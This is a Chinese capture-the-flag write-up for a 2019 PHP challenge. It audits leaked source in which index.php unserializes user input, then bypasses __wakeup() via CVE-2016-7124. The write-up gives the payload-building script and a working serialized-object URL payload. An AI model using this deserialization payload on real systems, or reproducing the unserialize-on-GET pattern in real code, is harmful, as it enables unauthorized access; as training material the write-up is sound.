[极客大挑战 2019]PHP

1. 提示网站存在备份，尝试扫描发现www.zip

2. 访问 /www.zip 下载源代码

3. 目录结构

├── class.php
├── flag.php
├── index.js
├── index.php
└── style.css

1. 审计代码

index.php 主要代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

class.php

<?php
include 'flag.php';
error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

1. 利用CVE-2016-7124漏洞绕过__wakeup()函数

   CVE-2016-7124：当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup()的执行。

2. 构造 payload

<?php
include 'class.php';
$username = 'admin';
$password = '100';
$select = new Name($username, $password);

$res = serialize($select);
echo $res;

把"Name":2改为"Name":3

/index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

get flag!